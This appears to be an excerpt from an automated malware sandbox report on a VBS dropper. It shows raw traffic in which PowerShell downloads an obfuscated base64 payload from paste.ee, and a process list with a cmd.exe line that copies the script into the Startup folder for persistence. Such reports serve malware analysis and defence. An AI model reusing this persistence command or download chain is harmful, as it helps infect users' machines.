                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                    Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                    Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                    Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                    Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                    Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                    Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.849709188.114.97.34437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-07 06:56:23 UTC67OUTGET /d/nyV34/0 HTTP/1.1
                                                                                                    Host: paste.ee
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-07 06:56:23 UTC1206INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 07 Oct 2024 06:56:23 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=2592000
                                                                                                    strict-transport-security: max-age=63072000
                                                                                                    x-frame-options: DENY
                                                                                                    x-content-type-options: nosniff
                                                                                                    x-xss-protection: 1; mode=block
                                                                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NgO%2FlkinOYFLqLgYq6d%2FSIWmRN0uMao2Ls68S2sJM31LxCtpA9%2FpRAyKWpQVbsr2ymHGGrezzBRUajquj%2BplmXavBweHhnKAlFZw1jw8Da7xv06y38EO0WZ0vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8cebfdb33b6e43ab-EWR
                                                                                                    2024-10-07 06:56:23 UTC163INData Raw: 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 49 39 55 57 62 68 35 47 49 69 41 6a 4c 77 34 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 44 41 75 41 41 4d 41 34 43 41 77 41
                                                                                                    Data Ascii: I9UWbh5GIiAjLw4CMuEjI942bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwA
                                                                                                    2024-10-07 06:56:23 UTC1073INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 32 30 30 30 0d 0a 42 4d 77 52 48 63 77 68 41 67 59 51 4f 43 4b 52 48 41 41 69 42 39 48 6f 45 41 41 53 42 4e 44 6f 45 63 30 52 2f 42 4b 42 48 46 49 6f 45 63 59 77 42 50 49 51 48 63 30 42 48 64 45 52 67 53 6b 52 67 53 77 68 42 48 38 67 44 4e 44 6f 45 4f 67 67 41 46 63 51 43 78 49 6f 45 41 41 53 42 4f 30 69 67 53 45 41 41 47 6b 69 67 53 55 69 67 53 49 77 42 49 34 51 41 4b 4d 67 41 41 34 68 41 5a 49 6f 45 56 41 67 48 42 45 69 67 53 55 68 41 43 45 41 45 54 49 67 44 43 6b 68 67 53 55 78 42 5a 45 6f 45 64 41 41 41 47 41 77 45 42 45 41 49 46 34 51 41 56 49 6f 45 56 59 51 47 42 4b 52 48 49 34 51 48 49 6b 52 67 53 34 51 41 56 49 6f 45 56 77 42 43 49 63 51 46 4a 46 52 53 52 49 67 41 41 63 51 53 52 41 41 49 45 30 51 53 52 45 41 41 46 34 51 48 44 30 52 7a 41 4b 42 43
                                                                                                    Data Ascii: 2000BMwRHcwhAgYQOCKRHAAiB9HoEAASBNDoEc0R/BKBHFIoEcYwBPIQHc0BHdERgSkRgSwhBH8gDNDoEOggAFcQCxIoEAASBO0igSEAAGkigSUigSIwBI4QAKMgAA4hAZIoEVAgHBEigSUhACEAETIgDCkhgSUxBZEoEdAAAGAwEBEAIF4QAVIoEVYQGBKRHI4QHIkRgS4QAVIoEVwBCIcQFJFRSRIgAAcQSRAAIE0QSREAAF4QHD0RzAKBC
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 68 44 64 77 52 48 4f 55 68 45 63 77 78 42 41 41 68 44 4f 77 68 41 41 55 67 44 4f 34 67 44 4f 51 41 41 48 30 50 67 52 34 51 41 41 59 41 48 4f 45 67 41 67 55 67 41 4f 55 50 67 53 49 41 49 48 55 50 67 53 41 41 49 46 45 50 67 53 41 41 49 46 34 51 34 41 4b 52 41 41 59 51 34 41 4b 42 41 67 55 67 44 4f 34 67 44 44 41 67 42 4e 44 6f 45 42 45 41 41 47 77 68 44 42 41 41 42 49 45 51 41 41 51 41 48 64 77 68 41 64 77 52 48 63 30 52 7a 41 4b 68 44 4e 44 6f 45 4e 44 6f 45 52 44 6f 45 63 30 4d 67 53 30 69 45 74 49 68 44 50 63 51 49 4f 34 67 44 43 41 51 42 41 4d 52 41 4b 51 41 41 54 49 41 41 54 45 41 47 53 55 68 42 41 4d 52 41 48 51 41 41 65 45 67 43 45 41 67 48 41 45 41 45 46 41 67 48 43 41 67 48 42 63 41 42 4f 45 77 42 44 30 4c 67 52 55 68 45 42 41 77 42 56 49 52 41 48
                                                                                                    Data Ascii: hDdwRHOUhEcwxBAAhDOwhAAUgDO4gDOQAAH0PgR4QAAYAHOEgAgUgAOUPgSIAIHUPgSAAIFEPgSAAIF4Q4AKRAAYQ4AKBAgUgDO4gDDAgBNDoEBEAAGwhDBAABIEQAAQAHdwhAdwRHc0RzAKhDNDoENDoERDoEc0MgS0iEtIhDPcQIO4gDCAQBAMRAKQAATIAATEAGSUhBAMRAHQAAeEgCEAgHAEAEFAgHCAgHBcABOEwBD0LgRUhEBAwBVIRAH
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 47 47 49 51 4c 53 59 77 41 4f 30 68 42 44 77 52 41 42 41 41 42 4f 45 51 41 41 51 51 42 64 45 51 41 41 55 51 4b 53 45 51 41 41 55 41 48 41 41 77 41 4f 77 52 41 41 51 41 48 47 49 51 4a 53 59 77 41 68 49 68 42 44 30 68 45 47 4d 51 42 64 59 77 41 4b 59 67 41 5a 49 68 42 44 49 67 42 43 67 67 42 43 34 67 42 43 41 77 45 41 67 43 42 41 4d 42 41 67 51 41 41 54 59 77 41 41 34 42 45 42 45 51 41 77 63 41 41 65 41 67 48 42 45 41 45 48 34 41 41 67 4d 51 46 53 41 41 49 45 67 41 41 67 4d 41 48 43 45 41 49 45 51 68 45 41 67 41 42 52 49 42 41 49 51 41 43 53 41 41 43 45 77 67 45 41 67 41 42 55 49 42 41 41 51 51 45 53 41 41 41 45 67 67 45 41 41 41 42 4d 49 42 41 41 51 51 41 41 41 77 41 55 49 52 41 59 49 52 46 47 63 51 45 53 45 41 47 53 55 68 42 48 67 67 45 42 67 68 45 56 59
                                                                                                    Data Ascii: GGIQLSYwAO0hBDwRABAABOEQAAQQBdEQAAUQKSEQAAUAHAAwAOwRAAQAHGIQJSYwAhIhBD0hEGMQBdYwAKYgAZIhBDIgBCggBC4gBCAwEAgCBAMBAgQAATYwAA4BEBEQAwcAAeAgHBEAEH4AAgMQFSAAIEgAAgMAHCEAIEQhEAgABRIBAIQACSAACEwgEAgABUIBAAQQESAAAEggEAAABMIBAAQQAAAwAUIRAYIRFGcQESEAGSUhBHggEBghEVY
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 41 38 45 41 4f 42 77 62 41 77 45 41 57 42 67 63 41 63 44 41 71 42 77 4d 41 51 48 41 55 42 67 53 41 6b 44 41 4d 42 77 59 41 63 44 41 73 42 41 64 41 67 47 41 6e 42 67 55 41 49 45 41 48 42 67 61 41 49 44 41 78 41 77 55 41 6b 48 41 74 42 41 62 41 67 46 41 78 41 77 64 41 55 48 41 47 42 77 59 41 4d 48 41 44 42 51 59 41 73 47 41 31 42 41 4e 41 45 46 41 5a 42 77 4d 33 42 41 41 31 42 51 55 41 45 48 41 76 42 77 4e 41 49 44 41 74 42 67 62 41 63 44 41 32 41 51 59 41 63 47 41 33 41 51 51 41 6b 47 41 75 42 77 53 41 73 47 41 5a 42 51 62 41 6b 44 41 53 42 41 4e 41 63 47 41 30 42 67 64 41 30 45 41 77 41 67 51 41 4d 44 41 69 42 77 61 41 77 45 41 55 42 51 53 41 63 47 41 77 42 51 53 41 49 48 41 35 42 51 53 41 51 44 41 6b 42 67 57 41 34 47 41 6f 42 67 52 41 6b 44 41 47 42 51
                                                                                                    Data Ascii: A8EAOBwbAwEAWBgcAcDAqBwMAQHAUBgSAkDAMBwYAcDAsBAdAgGAnBgUAIEAHBgaAIDAxAwUAkHAtBAbAgFAxAwdAUHAGBwYAMHADBQYAsGA1BANAEFAZBwM3BAA1BQUAEHAvBwNAIDAtBgbAcDA2AQYAcGA3AQQAkGAuBwSAsGAZBQbAkDASBANAcGA0BgdA0EAwAgQAMDAiBwaAwEAUBQSAcGAwBQSAIHA5BQSAQDAkBgWA4GAoBgRAkDAGBQ
                                                                                                    2024-10-07 06:56:23 UTC1369INData Raw: 6f 48 41 70 42 51 54 41 6f 47 41 73 42 51 55 41 55 46 41 4d 42 51 64 41 55 48 41 43 42 51 52 33 42 41 41 6a 42 67 54 41 4d 48 41 35 41 77 51 41 59 45 41 6f 42 67 59 41 55 45 41 50 42 41 56 41 55 47 41 70 42 77 56 41 41 46 41 34 42 51 54 41 67 44 41 45 42 41 56 41 4d 44 41 79 41 41 65 41 59 47 41 4a 42 41 65 41 6b 45 41 68 42 51 5a 41 67 44 41 4f 42 67 57 41 6b 44 41 4a 42 77 51 41 59 45 41 77 41 41 62 41 63 47 41 43 42 67 63 41 77 47 41 58 42 41 63 41 67 44 41 33 42 77 64 41 63 48 41 31 41 77 56 41 73 47 41 34 42 77 55 41 6f 47 41 59 42 51 51 41 67 45 41 34 42 77 53 33 42 41 41 6a 42 67 61 41 51 47 41 33 42 41 54 41 63 47 41 70 42 51 61 41 6f 46 41 4f 42 77 59 41 77 47 41 32 42 77 4d 41 51 44 41 75 42 41 65 41 51 44 41 30 42 67 5a 41 4d 45 41 43 42 41 56
                                                                                                    Data Ascii: oHApBQTAoGAsBQUAUFAMBQdAUHACBQR3BAAjBgTAMHA5AwQAYEAoBgYAUEAPBAVAUGApBwVAAFA4BQTAgDAEBAVAMDAyAAeAYGAJBAeAkEAhBQZAgDAOBgWAkDAJBwQAYEAwAAbAcGACBgcAwGAXBAcAgDA3BwdAcHA1AwVAsGA4BwUAoGAYBQQAgEA4BwS3BAAjBgaAQGA3BATAcGApBQaAoFAOBwYAwGA2BwMAQDAuBAeAQDA0BgZAMEACBAV
                                                                                                    2024-10-07 06:56:23 UTC1355INData Raw: 45 41 76 42 41 56 50 41 41 41 6f 42 77 63 41 55 48 41 73 42 67 52 4c 41 41 41 6c 42 41 64 41 6b 47 41 79 42 77 56 4c 41 41 41 6b 42 51 59 41 55 47 41 53 6c 41 41 41 49 44 41 34 56 41 41 41 51 45 41 4a 42 77 56 41 67 45 41 67 41 67 63 41 49 48 41 46 46 42 41 41 6f 48 41 35 42 41 65 41 63 48 41 32 42 51 64 41 51 48 41 7a 42 67 63 41 45 48 41 77 42 77 62 41 34 47 41 74 42 41 62 41 73 47 41 71 42 51 61 41 67 47 41 6e 42 67 5a 41 55 47 41 6b 42 77 59 41 49 47 41 68 56 44 41 41 59 44 41 7a 41 67 4c 41 63 44 41 7a 41 51 4e 41 38 43 41 70 42 67 63 41 45 47 41 6d 42 51 59 41 4d 46 41 67 41 77 4d 41 45 44 41 78 41 67 4c 41 49 44 41 78 41 51 4d 41 4d 44 41 75 41 41 4d 41 34 43 41 77 41 67 4e 41 38 43 41 6c 42 51 62 41 38 47 41 79 42 41 61 41 4d 45 41 67 41 51 4b 41
                                                                                                    Data Ascii: EAvBAVPAAAoBwcAUHAsBgRLAAAlBAdAkGAyBwVLAAAkBQYAUGASlAAAIDA4VAAAQEAJBwVAgEAgAgcAIHAFFBAAoHA5BAeAcHA2BQdAQHAzBgcAEHAwBwbA4GAtBAbAsGAqBQaAgGAnBgZAUGAkBwYAIGAhVDAAYDAzAgLAcDAzAQNA8CApBgcAEGAmBQYAMFAgAwMAEDAxAgLAIDAxAQMAMDAuAAMA4CAwAgNA8CAlBQbA8GAyBAaAMEAgAQKA


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:1
                                                                                                    Start time:02:56:03
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs"
                                                                                                    Imagebase:0x7ff75efd0000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:02:56:05
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
                                                                                                    Imagebase:0x7ff717f40000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:02:56:05
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
